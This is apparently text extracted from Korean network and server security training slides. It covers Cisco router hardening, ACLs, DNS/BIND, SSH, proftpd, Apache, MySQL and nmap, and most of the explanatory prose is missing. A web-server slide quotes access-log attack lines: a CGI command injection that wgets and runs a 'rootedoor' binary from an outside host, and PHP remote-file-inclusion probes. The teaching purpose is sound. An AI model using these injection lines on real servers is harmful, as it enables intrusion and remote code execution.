1. 2. 3. http://www.kisec.com ` 1
http://www.kisec.com ` 2
http://www.kisec.com ` 3
http://www.kisec.com ` 4
http://www.kisec.com ` 5
http://www.kisec.com ` 6
http://www.kisec.com ` 7
http://www.kisec.com ` 8
http://www.kisec.com ` 9
http://www.kisec.com ` 10
http://www.kisec.com ` 11
http://www.kisec.com ` 12
o o o o o o o o o
3 1
2
3
4
5
# clear arp-cache ; arp cache clear # conf t (conf)# arp 1.1.1.1 00d0.b789.d700 ; arp static 6
7
10M 10M 8 100M 800M. (half duplex), (full duplex) collision. 8
9
10
11
환경 요청 응답 데이터교환모두 환경 요청만이 응답 데이터교환모두 로작동 12
13
14
15
16
# Sentinel 17
18
19
* forward netstat Local Address Foreign Address State 0 *:10110 *:* LISTEN forward:1024 www:22 ESTABLISHED 20
21
22
23
24
SSL VPN 25
IPSec VPN vs SSL VPN IPSec VPN -network level - - - ( ) - - SSL VPN - application level - - (, ) - - 26
27
1. password 2. telnet 3. SNMP 4. disable 5. 6. 28
( ) (DB15) (WAN,DB60) (RJ45) AUX (RJ45) 29
( ) Virtual Terminals ( ) vty 0-4 Auxiliary TFTP Server. (NMS) 30
User EXEC Mode (ping..) Router> Global Configuration Mode. Router(config)# Privileged EXEC Mode Router# Other Configuration Modes. Router(config - mode)# Setup Mode RXBOOT Mode 31
(Privileged) ( ) Router con0 is now available Press RETURN to get started. User Access Verification Password: Router> Router> enable Password: Router# Router# disable Router> Router> exit User-mode prompt Privileged-mode prompt 32
Router>? Exec commands: access-enable Create a temporary Access-List entry atmsig Execute Atm Signalling Commands cd Change current device clear Reset functions connect Open a terminal connection dir List files on given device disable Turn off privileged commands disconnect Disconnect an existing network connection enable Turn on privileged commands exit Exit from the EXEC help Description of the interactive help system lat Open a lat connection lock Lock the terminal login Log in as a particular user logout Exit from the EXEC mrinfo Request neighbor and version information from a multicast router -- More -- 33
Privileged Router>ena Password: Router#? Exec commands: access-enable Create a temporary Access-List entry access-template Create a temporary Access-List entry appn Send a command to the APPN subsystem. atmsig Execute Atm Signalling Commands bfe For manual emergency modes setting calendar Manage the hardware calendar cd Change current device clear Reset functions clock Manage the system clock cmt Start or stop FDDI Connection Management functions configure Enter configuration mode connect Open a terminal connection copy Copy configuration or image data debug Debugging functions (see also 'undebug') delete Delete a file dir List files on given device -- More -- 34
Context-Sensitive Help Router# clok Translating "CLOK" % Unknown command or computer name,or unable to find computer address Router# cl? clear clock Router# clock set % Incomplete command. Router# clock set? Current Time (hh:mm:ss) Router# clock set 19:56:00 % Incomplete command. Router# clock Router# clock set 19:56:00? % Incomplete command. <1-31> Day of the month MONTH Month of the year Router# clock? set Set the time and date Router# clock set 19:56:00 04 8. ^ % Invalid input detected at the '^' marker Router# clock set 19:56:00 04 August % Incomplete command. Router# clock set 19:56:00 04 August? <1993-2035> Year 35
Router> $ value for our customers, employees, investors,and partners.. <Ctrl><A> <Ctrl><E> <Esc><B> <Ctrl><F> <Ctrl><B> <Esc><F>..... 36
<Ctrl><P> <Ctrl><N > or <Ctrl><P> Router> show history Router> terminal history size number-of-lines 37
show running-config show startup-config Router# show running-config Building configuration... Current configuration:! version 11.2! -- More -- Router# show startup-config Using 1108 out of 130048 bytes! version 11.2! hostname router -- More -- IOS 10.3 write terminal IOS 10.3 show config 38
show interface Router# show interface serial 1 Serial1 is up, line protocol is up Hardware is MK5025 Internet address is 183.8.64.129, subnet mask is 255.255.255.128 MTU 1500 bytes, BW 56 Kbit, DLY 20000 usec, rely 255/255, load 9/255 Encapsulation HDLC, loopback not set, keepalive set (10 sec) Last input 0:00:00, output 0:00:01, output hang never Last clearing of "show interface" counters never Output queue 0/40, 0 drops; input queue 0/75, 0 drops Five minute input rate 1000 bits/sec, 0 packets/sec Five minute output rate 2000 bits/sec, 0 packets/sec 331885 packets input, 62400237 bytes, 0 no buffer Received 230457 broadcasts, 0 runts, 0 giants 3 input errors, 3 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort 403591 packets output, 66717279 bytes, 0 underruns 0 output errors, 0 collisions, 8 interface resets, 0 restarts 45 carrier transitions 39
IOS show version RouterA#show version Cisco Internetwork Operating System Software IOS (tm) 2500 Software (C2500-JS40-L), Version 11.2(5), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1997 by cisco Systems, Inc. Compiled Tue 01-Apr-97 09:12 by ckralik Image text-base: 0x0303F9A8, data-base: 0x00001000 ROM: System Bootstrap, Version 5.2(8a), RELEASE SOFTWARE ROM: 3000 Bootstrap Software (IGS-RXBOOT), Version 10.2(8a), RELEASE SOFTWARE (f c1) RouterA uptime is 1 day, 5 hours, 50 minutes System restarted by reload System image file is "flash:c2500-js40-l.112-5.bin", booted via flash --More-- 40
IOS ( ) show version cisco 2522 (68030) processor (revision M) with 14336K/2048K bytes of memory. Processor board ID 05614645, with hardware revision 00000002 Bridging software. SuperLAT software copyright 1990 by Meridian Technology Corp). X.25 software, Version 2.0, NET2, BFE and GOSIP compliant. TN3270 Emulation software (copyright 1994 by TGV Inc). Basic Rate ISDN software, Version 1.0. 1 Ethernet/IEEE 802.3 interface(s) 2 Serial network interface(s) 8 Low-speed serial(sync/async) network interface(s) 1 ISDN Basic Rate interface(s) 32K bytes of non-volatile configuration memory. 16384K bytes of processor board System flash (Read ONLY) Configuration register is 0x2102 RouterA# 41
Cisco Discovery Protocol(CDP) Cisco Proprietary Data-Link Protocol TCP/IP Novell IPX Apple Talk Others CDP. LANs Frame ATM Others Relay IOS 10.3 CDP enable. 42
Show CDP Neighbor IP, IPX Router IP, AppleTalk #sho cdp CDP Router IP, CLNS, DECnet CDP Router IP, CLNS show cdp, (ip,ipx ),,, IOS. 43
CDP show cdp entry RouterA#show cdp entry RouterB ------------------------- Device ID: RouterB Entry address(es): IP address: 198.121.200.1 Novell address: 1002.0000.0c01.1111 Platform: cisco 2522, Capabilities: Router Interface: Serial1, Port ID (outgoing port): Serial0 Holdtime : 149 sec Version : Cisco Internetwork Operating System Software IOS (tm) 2500 Software (C2500-JS40-L), Version 11.2(5), RELEASE SOFTWARE (fc1) Copyright (c) 1986-1997 by cisco Systems, Inc. Compiled Tue 01-Apr-97 09:12 by ckralik RouterA# 44
CDP show cdp neighbors RouterA#show cdp neighbors Capability Codes: R - Router, T - Trans Bridge, B - Source Route Bridge, S - Switch, H - Host, I - IGMP Device ID Local Intrfce Holdtme Capability Platform Port ID RouterB.cisco.com Eth 0 151 R T 2522 Eth 0 RouterB.cisco.com Ser 0 165 R T 2522 Ser 3 RouterA#show cdp neighbors detail ------------------------- Device ID: RouterB Entry address(es): IP address: 198.121.200.1 Novell address: 1002.0000.0c01.1111 Platform: cisco 2522, Capabilities: Router Interface: Serial1, Port ID (outgoing port): Serial0 Holdtime : 149 sec 45
46
. Cisco IOS.. 47
Startup Router# show startup-config (show config)* Router# show running-config (write term)* Router# erase startup-config (write erase)* Router# reload Router# setup * 10.3. 48
setup #setup --- System Configuration Dialog --- At any point you may enter a question mark '?' for help. Use ctrl-c to abort configuration dialog at any prompt. Default settings are in square brackets '[]'. Continue with configuration dialog? [yes]: First, would you like to see the current interface summary? [yes]: Interface IP-Address OK? Method Status Protocol TokenRing0 unassigned NO not set down down Ethernet0 unassigned NO not set down down Serial0 unassigned NO not set down down Fddi0 unassigned NO not set down down 49
Setup Configuring global parameters: Enter host name [Router]: The enable secret is a one-way cryptographic secret used instead of the enable password when it exists. Enter enable secret [<Use current secret>]: Enter enable password [san-fran]: % Please choose a password that is different from the enable secret Enter enable password [san-fran]: Enter virtual terminal password [san-fran]: Configure SNMP Network Management? [no]: Configure IP? [yes]: Configure IGRP routing? [yes]: Your IGRP autonomous system number [1]: 200 Configure DECnet? [no]: Configure XNS? [no]: Configure Novell? [no]: yes Configure Apollo? [no]: Configure AppleTalk? [no]: yes Multizone networks? [no]: yes Configure Vines? [no]: Configure bridging? [no]: 50
Setup Configuring interface parameters: Configuring interface TokenRing0: Is this interface in use? [yes]: Tokenring ring speed (4 or 16)? [16]: Configure IP on this interface? [no]: yes IP address for this interface: 172.16.92.67 Number of bits in subnet field [0]: Class B network is 172.16.0.0, 0 subnet bits; mask is 255.255.0.0 Configure Novell on this interface? [no]: yes Novell network number [1]: Configuring interface Serial0: Is this interface in use? [yes]: Configure IP on this interface? [yes]: Configure IP unnumbered on this interface? [no]: IP address for this interface: 172.16.97.67 Number of bits in subnet field [0]: Class B network is 172.16.0.0, 0 subnet bits; mask is 255.255.0.0 Configure Novell on this interface? [yes]: no Configuring interface Serial1: Is this interface in use? [yes]:no 51
Setup The following configuration command script was created: hostname router interface TokenRing0 enable secret 5 $1$g722$dg2UVvWG6eekNRTE5LfmM/ enable password san-fran line vty 0 4 password san-fran snmp-server community! ip routing no decnet routing no xns routing novell routing no apollo routing appletalk routing no clns routing no vines no bridge no mop enabled -- More -- ip address 172.16.92.67 255.255.0.0 novell network 1 no mop enabled! interface Serial0 ip address 172.16.97.67 255.255.0.0 interface Serial1 shutdown! router igrp 200 network 172.16.0.0! end Use this configuration? [yes/no]: yes [OK] Use the enabled mode 'configure' command to modify this configuration. NVRAM. 52
Configuration File Cisco IOS 53
IOS 11.0 configure terminal show running-config show startup-config erase startup-config NVRAM configure memory copy running-config startup-config RAM Bit bucket copy tftp startup-config copy tftp running-config copy running-config tftp TFTP Server (IP Only) IOS 11.0 54
TFTP tokyo# copy running-config tftp Remote host []? 131.108.2.155 Name of configuration file to write [tokyo-confg]? Write file tokyo.2 to 131.108.2.155? [confirm] y Writing tokyo.2!!!!!!!! [OK] tokyo# tokyo.2 RAM Router# copy tftp running-config Host or network configuration file [host]? IP address of remote host [255.255.255.255]? 131.108.2.155 Name of configuration file [Router-confg]? tokyo.2 Configure using tokyo.2 from 131.108.2.155? [confirm] y Booting tokyo.2 from 131.108.2.155:!! [OK - 874/16000 bytes] tokyo# RAM 55
IOS 11.0 NVRAM Router# configure memory [OK] Router# NVRAM RAM Router# write erase [OK] Router# Router# write memory Router# Router# Router# show configuration Using 5057 out of 32768 bytes! enable-password san-fran! interface Ethernet 0 ip address 131.108.100.5 255.255.255.0! -- More -- NVRAM NVRAM NVRAM Bit bucket RAM Terminal 56
Configuration Router# config term Router(config)# : : : Router(config)# (commands) Router(config)# Router(config)#exit Router# Router# config term : : : Router(config)# router protocol Router(config-router)# : : : Router(config-router)# (commands) Router(config-router)# : : : Router(config-router)# exit Router(config)# interfacetype port Router(config-if)# : : : Router(config-if)# (commands) Router(config-if)# : : : Router(config-if)# exit Router(config)#exit Router# Global Configuration configuration Configuration 57
Configuration Router(config)# interface type port Router(config)# interface type slot/port serial, ethernet, tokenring, fddi, hssi, loopback, dialer, null, async, atm, bri, tunnel. Router(config-if)# shutdown Router(config-if)# no shutdown Shutdown Router(config-if)# exit configuration Router(config)# interface type number.subinterface physical virtual 58
IOS 11.x Configuration Router# show running-config? Router# copy running-config startup-config Router# copy running-config tftp Router(config)# no... Router# config mem Router# copy tftp running-config Router# show startup-config Router# erase startup-config Router# reload 59
ID Router(config)# hostname Tokyo Tokyo# Tokyo(config)# banner motd # Welcome to router Tokyo Accounting Department 3rd Floor # Tokyo(config)# interface e 0 Tokyo(config-if)# description Engineering LAN, Bldg. 18 60
61
password 62
password 63
access-list 64
65
66
standard access-list 67
68
69
extended access-list 70
71
access-list 72
acl 73
Access-list access-list 10 permit host 211.1.2.3 access-list 10 permit host 211.1.2.4 access-list 10 deny any line vty 0 4 access-class 10 in exec-timeout 5 0 password 7 09581B031200032F064G173W2E25 login local * access-class 74
-. telnet listener disable line vty 0 4 transport input none -. console line con 0 login local exec-timeout 2 0 // console // 2 // 0 75
-. telnet Switch>(enable)set ip permit enable Switch>(enable)set ip permit 211.1.1.1 telnet -. Snmp Switch>(enable)set ip permit 211.1.1.1 snmp -. Switch>(enable)set ip permit 211.1.1.1 all 76
1. Default community string : Public x27swf3 2. Snmp (udp/161) snmp-server community x27swf3 ro 11 snmp-server contact antihong@tt.co.kr access-list 11 permit host 211.1.2.5 access-list 11 deny any 3. snmp disable. no snmp-server 4. v3 (mrtg X) 77
SNMP com2sec mynetwork 211.0.0.1 x27swf3 *NIX snmpd.conf Windows snmp Snmp Snmp brute force 78
# conf t (config)# no service udp-small-servers (config)# no service tcp-small-servers (config)# no service finger (config)# no service pad x.25 (config)# no ip bootp server ( ) (config)# no ip http server (config)# no tftp-server (config)# no ip source-route ip spoofing source-route disable (config)# no cdp run # set cdp disable CatOS 79
Interface. (config)# int serial0 (config-if)# no ip redirects (config-if)# no ip directed-broadcast (config-if)# no ip proxy-arp (config-if)# no ip unreachables interface shutdown!! (config)# interface eth0/3 (config-if)# shutdown 80
interface Serial0 ip access-group 101 in access-list 101 deny ip host 0.0.0.0 any access-list 101 deny ip 127.0.0.0 0.255.255.255 any access-list 101 deny ip 10.0.0.0 0.255.255.255 any access-list 101 deny ip 172.16.0.0 0.15.255.255 any access-list 101 deny ip 192.0.2.0 0.0.0.255 any access-list 101 deny ip 169.254.0.0 0.0.255.255 any access-list 101 deny ip 192.168.0.0 0.0.255.255 any access-list 101 deny ip 240.0.0.0 15.255.255.255 any access-list 101 deny udp any any eq 1433 access-list 101 deny ip 211.1.1.0 0.0.0.255 any access-list 101 deny ip 211.1.2.0 0.0.0.255 any access-list 101 permit ip any any inbound IP IP : http://www.iana.org/assignments/ipv4-address-space 81
interface Serial0 ip access-group 110 out access-list 110 permit ip 211.1.1.0 0.0.0.255 any access-list 110 permit ip 211.1.2.0 0.0.0.255 any access-list 110 deny ip any any log * log : * log-input : (increase some CPU load) SLOT 5:*May 17 20:06:46: %SEC-6-IPACCESSLOGDP: list 110 denied icmp 10.1.1.2 (GigabitEthernet0 ) -> 61.182.3.158 (0/0), 2 packets outgoing IP 82
) interface Null0 no ip unreachables! ip route <dest to drop> <mask> Null0 interface Null0 no ip unreachables! ip route 211.1.1.1 255.255.255.255 Null0. ACL cpu 83
CatOS> (enable) set port security 3/1 enable CatOS> (enable) set port security 3/1 enable 01-02-03-04-05-06 CatOS> (enable) set port security 3/21 enable age 10 maximum 5 violation shutdown : 2003 May 03 15:40:32 %SECURITY-1-PORTSHUTDOWN: Port 3/21 shutdown due to no space CatOS> (enable) set cam static filter 00-02-03-04-05-06 1 MAC CatOS> (enable) set port broadcast <mod/port> 0.01% broadcast broadcast storm set port broadcast <mod/port> 0.01% 84
Ip accounting IP Accounting :, IP,, performance impact!!! ROUTER# conf t ROUTER(config)# int serial0 ROUTER(config-if)# ip accounting ROUTER(config-if)# exit ROUTER# sh ip accounting Source Destination Packets Bytes 192.168.65.75 210.145.255.74 1 75 192.168.65.103 66.77.73.150 7 6136 192.168.66.35 210.196.133.2 1 109 : http://cipaf.sourceforge.net/ CIPAF 85
Netflow NetFlow ROUTER# conf t ROUTER(config)# ip flow-export version 5 peer-as ROUTER(config)# ip flow-export destination 211.0.0.1 2055 ROUTER(config)# int serial0 ROUTER(config-if)# ip route-cache flow ROUTER(config-if)# exit ROUTER# sh ip cache flow Protocol Total Flows Packets Bytes Packets Active(Sec) Idle(Sec) -------- Flows /Sec /Flow /Pkt /Sec /Flow /Flow TCP-WWW 716 0.0 9 84 0.1 4.1 2.1 TCP-SMTP 71 0.0 30 996 0.0 8.0 3.2 TCP-other 37 0.0 4 70 0.0 3.0 3.8 UDP-DNS 118 0.0 1 63 0.0 1.2 10.1 UDP-other 68 0.0 1 173 0.0 0.3 10.8 ICMP 5 0.0 1 67 0.0 0.0 11.9 Total: 1015 0.0 9 294 0.2 3.7 3.8 86
Netflow src dest pr src port des port 203.254.149.28 134.111.200.231 06 0401 0089 203.254.149.28 134.111.200.232 06 0402 0089 203.254.149.28 134.111.200.233 06 0403 0089 203.254.149.28 134.111.200.234 06 0404 0089 Protocol : 06 = 0*16^1 + 6*16^0 = 6 (tcp) : 0089 = 16^3*0 + 16^2*0+16^1*8+16^0*9 = 137 # show ip cache flow include 0089 137 87
http://moran.kaist.ac.kr/ 88
2005/04/06 15:34:06 210.183.99.253.59619 -> 221.139.0.112.1433 6 5 380 2005/04/06 15:34:07 210.183.99.253.60814 -> 221.139.0.55.1433 6 5 378 2005/04/06 15:34:07 210.183.99.253.60580 -> 221.139.0.90.1433 6 5 378 2005/04/06 15:34:03 210.183.99.253.57012 -> 221.139.0.55.1433 6 5 378 2005/04/06 15:34:06 210.183.99.253.59524 -> 221.139.0.49.1433 6 5 378 2005/04/06 15:34:06 210.183.99.253.59438 -> 221.139.0.49.1433 6 4 338 2005/04/06 15:34:03 210.183.99.253.57065 -> 221.139.0.133.1433 6 4 348 2005/04/06 15:34:05 210.183.99.253.58523 -> 221.139.0.62.1433 6 5 378 2005/04/06 15:34:06 210.183.99.253.59872 -> 221.139.0.17.1433 6 5 378 2005/04/06 15:34:05 210.183.99.253.59066 -> 221.139.0.133.1433 6 5 388 2005/04/06 15:34:07 210.183.99.253.60325 -> 221.139.0.49.1433 6 5 378 2005/04/06 15:34:06 210.183.99.253.59799 -> 221.139.0.17.1433 6 5 378 2005/04/06 15:34:04 210.183.99.253.57619 -> 221.139.0.17.1433 6 5 378 2005/04/06 15:34:05 210.183.99.253.58930 -> 221.139.0.133.1433 6 5 388 89
90
Rate-limit ** rate-limit {input output} bps burst-normal burst-max conform-action action exceedaction action burst-normal : burst-max : conform-action : (transmit) exceed-action :, (drop) burst-normal = (bps/8) * 1.5 burst-normal burst-max = (bps/8) * 2 ** > TCP : ~90 % (HTTP, FTP and P2P tools) > UDP : ~10 % (DNS, SNMP, streaming) > ICMP : <1 % 91
Rate-limit int serial 0 rate-limit input access-group 150 2000000 250000 250000 conform-action transmit exceed-action drop rate-limit input access-group 160 512000 8000 8000 conform-action transmit exceed-action drop rate-limit output access-group 150 2000000 250000 250000 conform-action transmit exceed-action drop rate-limit output access-group 151 1000000 250000 250000 conform-action transmit exceed-action drop rate-limit output 19000000 3562500 4750000 conform-action transmit exceed-action drop access-list 150 permit udp any any access-list 151 permit ip host 211.0.0.1 any access-list 160 permit icmp any any echo-reply 92
Logging (1)console logging (2) Terminal line logging (3) Buffered logging (4) snmp trap logging (5) ACL violation logging (6) syslog logging (best way!!) Router# config t (config)# logging trap information (config)# logging 14.2.9.6 (config)# logging facility local6 (config)# logging source-interface loopback0 /etc/syslog.conf (syslog udp 514 open) udp 514!! local6.debug /var/log/routers.log 93
94
show clock detail show version show running-config show startup-config show reload show ip route show ip arp show users show logging show ip interface show interfaces show tcp brief all show ip sockets show ip cache flow show ip cef show snmp user show snmp group show clock detail 95
1
ftp ( ) proftpd : http://www.proftpd.org/ -wu-ftpd - -xinetd/ standalone ftp /etc/passwd, /etc/shadow. /etc/ftpusers id. /etc/shell RequireValidShell off (..) 2
(proftpd.conf) ServerType standalone (inetd) DefaultRoot ~!system User nobody / Group nobody ServerIdent On "Welcome to FTP" MaxClients MaxClientsPerHost time." 3 "Sorry, you may not connect more than one MaxHostsPerUser 1 "Sorry, you may not connect more than 1 IP." 3
limit command <Limit command>... </Limit> command : CWD : MKD : RNFR,RNTO : DELE : RMD : RETR : STOR : READ : FTP DIRS : LOGIN : WRITE :,, FTP ALL : FTP 4
limit command ) <Limit command>... </Limit> <Anonymous ~ftp>... <Limit LOGIN> AllowAll </Limit> <Limit WRITE> DenyAll </Limit> <Directory incoming> <Limit STOR MKD> AllowAll </Limit> </Directory> </Anonymous> 5
<limit LOGIN> Order deny,allow deny default Deny from 192.168.1. Allow from all <limit> <Limit LOGIN> AllowUser user1 AllowUser test2 AllowGroup normal DenyAll </Limit> 6
1. SMTP relay 2. sendmail.cf 3., 7
8
9
: (1) IP (2) 10
11
12
13
14
15
16
17
18
19
20
21
22
<VirtualHost secret.abc.co.kr> DocumentRoot/usr/local/apache/htdocs/secret/ ServerName secret.abc.co.kr <Location /secret.html> order deny,allow deny from all allow from 192.168.1.1 </Location> </VirtualHost> http://secret.abc.co.kr/secret.html 192.168.1.1 23
<VirtualHost secret.abc.co.kr> DocumentRoot /usr/local/apache/htdocs/secret/ ServerName secret.abc.co.kr <Files secret.html> AuthName "ID/PW. AuthType Basic AuthUserFile /usr/local/apache/htdocs/.htpasswd Require valid-user </Files> </VirtualHost>.htpasswd id/pw 24
25
26
technote ( ) 201.9.xxx.xxx - - [28/Oct/2004:10:59:45 +0900] "GET /cgi/b/t/board/main.cgi?board=free_board&command=xxxx_xxxx&xxxxxx= wget%20- P%20/tmp%20http://xxx.xxxxx.com/cavaleirosb1/xpl/rootedoor HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" 201.9.xxx.xxx - - [28/Oct/2004:11:00:10 +0900] "GET /cgi/b/t/board/main.cgi?board=free_board&command=xxxx_xxxx&xxxxxx= cd%20..;cd %20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd% 20..;cd%20..;cd%20..;cd%20/tmp;chmod%20777%20rootedoor;./rootedoor HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)" ( ) php.ini allow_url_fopen = Off 200.103.32.152 - - [14/Feb/2005:08:26:06 +0900] "GET /bbs//include/write.php? dir=http://www.xxx.xxx.br/contador/cmd?&cmd=id HTTP/1.0" 200 0 219.116.94.139 - - [14/Feb/2005:09:54:38 +0900] "GET http://xxx.xxx.xxx.kr/bbs//include/write.php? dir=http://www.xxx.xxx.br/cmd.txt?&cmd=ver HTTP/1.0" 200 0 27
28
29
31
DNS? DNS * TOP20 UNIX 1 http://www.sans.org/top20/ * http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=dns : 75 http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bind : 33 DNS * Forward Lookup (Host IP) www.yahoo.co.kr 202.43.214.151 * Reverse Lookup (IP Host) 202.43.214.151 UNKNOWN-202-43-214-151.yahoo.com 32
DNS protocol DNS Spoofing DNS Cache Poisoning DNS ID hacking Denial Of Service 33
DNS protocol 1. (microsoft.com). 2. (microsoft.com). 3. client microsoft.com. 4.DNS 1-2. 34
Bind DNS Bind 4.x. Bind 8.x root DNS DNS. Query. No new feature,only major security patch. Bind 9.x DNSSEC code-rewrite. multithread (answering queries while loading zones) djbdns. DNS protocol (zone-transfer, tcp 53 X, ) Nsd(Name Server Daemon) http://www.nlnetlabs.nl/nsd/ Query, Authoritative-only. 35
master/slave DNS primary, secondary? (X) 1, 2? (X) master, slave! (O)! master backup DNS slave? (1) Root DNS A.root-servers.net : master B-M.root-servers.net : slave (2).kr DNS ns.krnic.net : master ns.kreonet.re.kr, kr2nd.kornet.net, kr2ld.dacom.co.kr, kr2nd.hitel.net, usns.dacom.co.kr : slave master, slave! Slave!! 36
DNS Microsoft DNS 2001 1. master/slave Network. (Kt, Dacom, Hanaro Good!) master/slave IDC master/slave OS single point of failure 37
DNS 38
DNS Advertising : Resolving : # nslookup nog.or.kr. nis.dacom.co.kr Server: nis.dacom.co.kr Address: 164.124.101.31 Name: nog.or.kr Served by: - J.ROOT-SERVERS.NET 192.58.128.30 # nslookup nog.or.kr. ns.dacom.co.kr Server: ns.dacom.co.kr Address: 164.124.101.2 Name: nog.or.kr Address: 203.231.233.36 - K.ROOT-SERVERS.NET 193.0.14.129 - L.ROOT-SERVERS.NET 198.32.64.12 39
DNS -recursion Recursion (1) DoS (2) spoofing cache poisoning Recursion options { allow-recursion {127.0.0.1; 192.168.1.0/24; }; }; acl internal { 127.0.0.1; 192.168.1.0/24; }; options { allow-recursion {internal; }; }; 40
DNS -recursion recursion options { allow-recursion {none;}; }; options { recursion no; }; bind 4.x options no-recursion 41
DNS -zone transfer * zone-transfer (1) bandwidth DoS. (2) IP. * zone-transfer (1) master-slave options { allow-transfer { 192.168.1.10; }; }; options { allow-transfer { none; }; }; (2) Only master options { allow-transfer { none; }; }; (3) zone "server.com" { type master; file "server.zone"; allow-transfer { 192.168.1.10; }; }; zone-transfer [root@dns /root]# dig @ns.xxxxx.ac.kr xxxxx.ac.kr axfr ; <<>> DiG 8.2 <<>> @ns.xxxxx.ac.kr xxxxx.ac.kr axfr ; (1 server found) $ORIGIN xxxxx.ac.kr. @ 1H IN SOA ns root.ns ( 2003101773 ; serial 6H ; refresh 10M ; retry 1W ; expiry 1H ) ; minimum 1H IN NS ns 1H IN NS ns2 1H IN MX 0 smtp 1H IN MX 10 smtp2 1H IN A xxx.xxx.6.20 ling 1H IN A xxx.xxx.100.22 script 1H IN A xxx.xxx.44.18 mobicomm 1H IN A xxx.xxx.19.212 knuth 1H IN A xxx.xxx.44.14 maynard 1H IN A xxx.xxx.47.79... 42
TSIG * TSIG : Transaction SIGnature IP ( ) * master /slave 2 * (5 expired) * [root@dns root]# dnssec-keygen -a hmac-md5 -b 128 -n HOST host1-host2. Khost1-host2.+157+35206 128bit(16byte) hmac-md5 base-64 IP ) allow-transfer { 192.168.3.4; ); TSIG ) allow-transfer { key host1-host2; ); 43
TSIG zone-transfer *master key host1-host2. { algorithm hmac-md5; secret "+NLqXOznZv4jhV5amBL2yg=="; }; zone "server.com" { type master; file "server.zone"; allow-transfer { key host1-host2.; }; }; * slave key host1-host2. { algorithm hmac-md5; secret "+NLqXOznZv4jhV5amBL2yg=="; }; server 192.168.3.5 { // 192.168.3.5 master DNS IP keys { host1-host2.; }; }; zone "server.com" { type slave; masters {192.168.3.5;}; file "server.zone"; }; 44
Bind * Bind * Bind (1) dig # dig @ns.server.com txt chaos version.bind (2) nslookup # nslookup -q=txt -class=chaos version.bind ns.server.com 45
DNS *udp,tcp53 udp 53 : DNS, tcp 53 : (1) Zone transfer (2) udp 53 484 byte tcp * tcp 53? DNS servers MUST support UDP and SHOULD support TCP (RFC 1123) * : 1024:65535, 53 -bind 4.x source port 53. - query-source address * port 53 ; (only udp) 46
DNS -root Server * 2002 10 21 1 root icmp DDoS. 9 root http://boston.internet.com/news/article.php/1486981 47
root DNS 13. http://www.root-servers.org/ 48
gtld (com/net) DNS 13 VeriSign F, Seattle, WA A, Herndon,VA G, Mt. View, CA C, Dulles,VA B, Mt. View, CA D, Sterling,VA E, Los Angeles, CA L, Atlanta, GA I, Stockholm, Sweden H, Amsterdam, Netherlands K, London, United Kingdom J, Tokyo, Japan M, Hong Kong, China 49
.kr DNS 6.KR KRNIC 1 (Primary) 4 5 (Secondary), ) San Jose, CA,USA) 50
SSH OpenSSH(http://www.openssh.org/) : sshd : /etc/ssh/ SSH.COM ssh(http://www.ssh.com/) : sshd2 : /etc/ssh2/ 52
OpenSSH * SSH protocol v1 : v2 :, v2 * ssh -. -. 53
OpenSSH * /etc/ssh/sshd_config Protocol 2,1 2 PermitRootLogin no RhostsAuthentication no AllowGroups wheel admin AllowUsers user1 user2 Port 875 54
SSH2 * /etc/ssh2/sshd2_config DenyUsers devil@192.168.1.3,warez,1337 AllowHosts 211.47.65.0/24 192.168.1.3 PasswordGuesses 3 Ssh1Compatibility no # scp /tmp/test.dat 192.168.1.3:/root/ root@192.168.1.3's password: xxxxx Transfering /tmp/test.dat -> 192.168.1.3:/root/test.dat (11k)... 10445 bytes transferred in 0.07 seconds [138.75 kb/sec]. 55
mysql * db root.!!! /etc/my.cnf [mysqld] user=mysql *. $ mysql -u root mysql mysql> UPDATE user SET Password=PASSWORD('xxxxxxx') WHERE user='root'; mysql> FLUSH PRIVILEGES; *. (db.) 56
58
59
60
61
62
63
NMAP : http://www.insecure.org/nmap/ #./configure ; make; make install Nmap nmap [ ] [ ] < > State Open: accept(), Filtered : 64
nmap (stealth) : SYN/FIN/XMAS/ Null: root, -ss : SYN, half-open syn syn/ack opened rst closed -sf : FIN RST closed opened -sx : SYN/FIN/ACK/URG/PSH/RST -sn : -st : connect() -su : udp icmp port unreachable closed opened -sp : icmp echo request tcp 65
nmap -A : # nmap -A server.com PORT STATE SERVICE VERSION 22/tcp open ssh SSH 2.0.13 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Sendmail smtpd 8.12.3 80/tcp open http Apache httpd 1.3.26 ((Unix) PHP/4.0.5) -O : fingerprinting OS OS nmap-os-fingerprints -F : /usr/local/share/nmap/nmap-services -P0 : icmp echo request 66
# nmap -v 192.168.1.1 192.168.1.1 tcp. -v. # nmap -ss -O 192.168.1.0/24 192.168.1.10/24, 192.168.1.1 192.168.1.254 254 IP SYN. -O. # nmap -sx -p 22,53,110,143,4564 198.116.*.1-127 192.168.0.0/16 B IP 1 127 IP sshd, DNS, pop3d, imapd 4564 X-mas. 67
(lsof) lsof : 'List Open File * : lsof -p <PID> * user : lsof -u lsof -u UID * : lsof filename * : lsof -c process_name 68
(netstat) * network,, * : -a :. -l :. -p :. -r :. route. -n : ip (reverse lookup). -c : netstat. 69